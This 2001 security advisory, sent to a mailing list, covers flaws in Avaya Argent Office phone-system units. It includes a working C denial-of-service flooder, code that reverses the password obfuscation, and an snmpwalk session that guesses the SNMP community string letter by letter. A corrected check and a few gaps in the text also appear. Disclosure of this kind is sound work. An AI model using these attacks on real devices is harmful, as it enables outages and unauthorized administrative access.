[NEWS] Multiple Vulnerabilities in Avaya Argent Office

From: support@securiteam.com
Date: 08/09/01

From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Multiple Vulnerabilities in Avaya Argent Office
Message-Id: <20010809040059.896A9138C4@mail.der-keiler.de>
Date: Thu,  9 Aug 2001 06:00:59 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Vulnerabilities in Avaya Argent Office


The <http://wwwdb.avaya.com/pls/bcs/solutions.main?p_id=66> ArgentOffice
branch of products (now known as the Network Alchemy line) from
<http://www.avaya.com> Avaya is a solution integrating a PBX, network
connectivity, dial on demand networking and more. The product contains
multiple security vulnerabilities that allow attackers to cause the
program to no longer provide service, gain elevated privileges and modify
the current configuration of the product. All of these security
vulnerabilities are only possible on a local network (this system is
designed for small offices), so they should not be much of a problem, but
they might still pose a problem in some organizations or configurations.


1. Local denial of service:
Sending a UDP packet with no payload to port 53 causes the Argent Office
to reboot. The unit comes back up very quickly, so in order to cause a
denial of service one needs to send a large amount of packets repeatedly.

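/* argent_kill.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Reboots an Argent Office box by sending udp packets with no payload to
port 53
usage: argent_kill ip_address
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in addr;
    struct hostent *host;
    int s;

    if (argc < 2) { fprintf(stderr, "usage: argent_kill ip_address\n"); exit(1); }

    /* UDP socket */
    s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s==-1) { perror("socket()"); exit(1); }

    /* resolve the unit's address and fill in port 53 */
    host = gethostbyname(argv[1]);
    if (host==0) { herror("gethostbyname"); exit(1); }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(53);
    memcpy(&addr.sin_addr, host->h_addr_list[0], host->h_length);

    if (connect(s,(struct sockaddr *)&addr,sizeof(addr))==-1) { perror("connect()"); exit(1); }

    /* one datagram with no payload per second */
    for (;;) {
        send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
    }
}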

2. Easily decryptable configuration password
Argent Office is configured through a strange TFTP look-alike. For
example, to reboot a unit, one must get the following file via TFTP:

Where 00e007002666 is the MAC address of the unit and password is the
obfuscated password. Since this packet is easily sniffed and the
obfuscation algorithm does not change, anyone with a sniffer can easily
obtain administrative privileges. The obfuscation mechanism is rather
simple, as the following example demonstrates:

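/* argent_obfuscate.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Demonstrates how the password obfuscation mechanism works in argent office
products */
#include <stdio.h>
#include <string.h>
int main(int argc,char **argv)
{
    int i, len;
    unsigned char buf[32];
    if (argc < 2) { fprintf(stderr, "usage: argent_obfuscate password\n"); return 1; }
    /* copy the password into buf, truncated to the buffer size */
    len = strlen(argv[1]) < sizeof(buf) ? (int)strlen(argv[1]) : (int)sizeof(buf);
    memcpy(buf, argv[1], len);
    /* each byte is offset by 0x11 minus its position in the password */
    for (i=0;i<len;i++)
        printf("0x%2.2X ",(unsigned)(buf[i]+0x11-i));
    printf("\n");
    return 0;
}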

Show the hex values for the password 'idiocy':

~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85

3. SNMP handling
The software does SNMP authentication via something similar to:
 if (strncmp(n,c,strlen(n))==0) { /* ok, valid community */ }

Where c is the community string and n is the community string from the

So if the size of the password in the packet is 0 then the authentication
is always ok.

~$ snmpwalk "" system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

This would allow you to guess the community string character by character.

For guessing the first letter:
~$ snmpwalk a system.sysDescr.0
Timeout: No Response from
[the first letter is not a]
[several combinations later, is it p?]
~$ snmpwalk p system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

[ok we have the first letter, lets go for the second]
~$ snmpwalk pa system.sysDescr.0
Timeout: No Response from
[the second letter is not a]
[several combinations later, is it r?]
~$ snmpwalk pr system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

After a small amount of combinations we find out that, the community is

While not much is gained by using SNMP, the community may be some company
standard, and knowing it may open other doors.
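
The comparison described above, shown beside a corrected version, as an added example that is not code from the advisory or from Avaya. The function names, the explicit length parameters and the sample community string are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Flawed check, as the advisory describes it: the comparison length is
   taken from n, the community string supplied in the packet, so any
   prefix of c (including the empty string) is accepted. */
static int community_ok_flawed(const char *n, const char *c)
{
    return strncmp(n, c, strlen(n)) == 0;
}

/* Corrected check: the lengths must match exactly, and every byte is
   compared without an early exit so that timing does not reveal the
   position of the first mismatch. Rejecting an empty community is an
   assumption made here, not something the advisory specifies. */
static int community_ok_fixed(const char *n, size_t n_len,
                              const char *c, size_t c_len)
{
    unsigned char diff = 0;
    size_t i;

    if (n_len == 0 || n_len != c_len)
        return 0;
    for (i = 0; i < c_len; i++)
        diff |= (unsigned char)n[i] ^ (unsigned char)c[i];
    return diff == 0;
}

int main(void)
{
    /* Constructed sample values, not taken from any real device. */
    const char *configured = "s3cr3t-ro";
    const char *received[] = { "", "s3", "sx", "s3cr3t-ro", "s3cr3t-rox" };
    size_t i;

    for (i = 0; i < sizeof(received) / sizeof(received[0]); i++)
        printf("\"%s\": flawed=%d fixed=%d\n", received[i],
               community_ok_flawed(received[i], configured),
               community_ok_fixed(received[i], strlen(received[i]),
                                  configured, strlen(configured)));
    return 0;
}
```

Only the full, exact-length string passes the corrected check, so a response no longer confirms a partial guess.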

4. Broadcast TFTP requests
The system in its default configuration requests a file called HoldMusic
via TFTP to the broadcast address. You could serve this file and change
your company's music on hold tune to something else.


The information has been provided by <mailto:sq5bpf@rock.andra.com.pl>
Jacek Lipkowski.

